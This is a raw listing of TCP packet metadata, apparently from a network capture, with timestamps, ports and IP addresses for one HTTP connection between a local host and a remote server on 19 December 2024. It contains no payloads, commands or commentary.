Dec 19, 2024 10:10:20.994961977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.995779991 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.995830059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.995887995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.995932102 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.996788979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.996853113 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.996906042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.996953011 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.997687101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.997724056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.997746944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.997772932 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.998389006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.998441935 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.998505116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.998550892 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.999375105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.999420881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.145258904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.145287037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.145376921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.145376921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.145611048 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.145690918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.145765066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.145765066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.146261930 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.146301031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.146409988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.146409988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.147140980 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.147186995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.147234917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.147279978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.148145914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.148191929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.148201942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.148242950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.149056911 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.149100065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.149130106 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.149169922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.149802923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.149847031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.149920940 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.149961948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.150717020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.150769949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.150820971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.150863886 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.151597023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.151639938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.151715994 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.151757956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.152476072 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.152518988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.152667999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.152710915 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.153366089 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.153409958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.153470039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.153517962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.154309988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.154328108 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.154356003 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.154371977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.155153990 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.155215979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.155246973 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.155261040 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.156060934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.156109095 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.156197071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.156234980 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.156955004 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.157001019 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.157146931 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.157188892 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.157819033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.157861948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.158041954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.158085108 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.158751965 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.158798933 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.159086943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.159132004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.159648895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.159692049 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.159746885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.159790993 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.160474062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.160514116 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.160598040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.160643101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.161443949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.161463976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.161489964 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.161504984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.162291050 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.162333965 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.162380934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.162421942 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.163161993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.163203955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.163248062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.163289070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.164096117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.164149046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.164279938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.164323092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.164962053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.165005922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.165079117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.165121078 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.165954113 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.165997028 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.166179895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.166222095 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.166764975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.166804075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.166913033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.166950941 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.167629004 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.167671919 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.167758942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.167799950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.168673992 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.168716908 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.168817997 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.168859959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.169430971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.169471979 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.169547081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.169588089 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.170382977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.170428991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.170469999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.170522928 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.171370029 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.171416044 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.171494961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.171540976 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.172239065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.172276020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.172317028 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.172359943 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.173058987 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.173150063 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.173211098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.173253059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.173923016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.173969984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.174071074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.174112082 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.174855947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.174895048 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.175026894 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.175066948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.176024914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.176067114 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.176090002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.176129103 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.176800013 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.176830053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.176841021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.176868916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.177521944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.177565098 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.177598953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.177638054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.178323984 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.178365946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.178493977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.178534985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.179217100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.179260969 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.179295063 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.179342031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.180095911 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.180136919 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.180255890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.180296898 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.181152105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.181200027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.181248903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.181292057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.181927919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.181976080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.182017088 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.182058096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.182816029 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.182857990 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.182957888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.182997942 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.183664083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.183706999 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.183710098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.183748960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.184545040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.184593916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.184715986 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.184755087 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.185457945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.185502052 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.185573101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.185619116 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.186446905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.186465025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.186490059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.186503887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.187422991 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.187443018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.187465906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.187488079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.188101053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.188148975 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.188306093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.188345909 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.188987970 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.189028025 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.189202070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.189240932 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.189882040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.189924955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.190059900 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.190102100 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.190785885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.190828085 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.190888882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.190928936 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.191680908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.191724062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.338027954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.338099957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.338277102 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.338418961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.338463068 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.338604927 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.339238882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.339287043 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.339330912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.340114117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.340137005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.340154886 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.340183973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.341048956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.341097116 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.341140032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.342313051 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.342363119 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.342405081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.342822075 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.342866898 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.342909098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.343592882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.343650103 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.343717098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.343976974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.344360113 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.344569921 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.344624996 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.345360041 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.345448017 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.345511913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.346457958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.346509933 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.346584082 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.347302914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.347357988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.347428083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.348033905 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.348334074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.348382950 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.348436117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.349402905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.349452972 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.349493980 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.349544048 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.350315094 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.350358009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.350373983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.351162910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.351210117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.351232052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.352070093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.352125883 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.352157116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.352303028 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.352927923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.353020906 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.353070974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.353743076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.353821993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.353890896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.354500055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.354554892 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.354672909 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.355334997 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.355351925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.355384111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.355411053 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.355958939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.356024981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.356076956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.356853962 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.357038975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.357089996 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.357841015 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.357887983 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.358028889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.358582973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.358630896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.358671904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.359360933 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.359415054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.359452009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.359497070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.360059977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.360105991 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.360151052 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.360997915 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.361099958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.361161947 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.361660957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.361705065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.361763000 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.361866951 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.362581968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.362693071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.362740993 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.363358021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.363495111 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.363543987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.364331007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.364402056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.364449024 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.365166903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.365212917 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.365235090 CET	80	49881	185.215.113.16	192.168.2.6
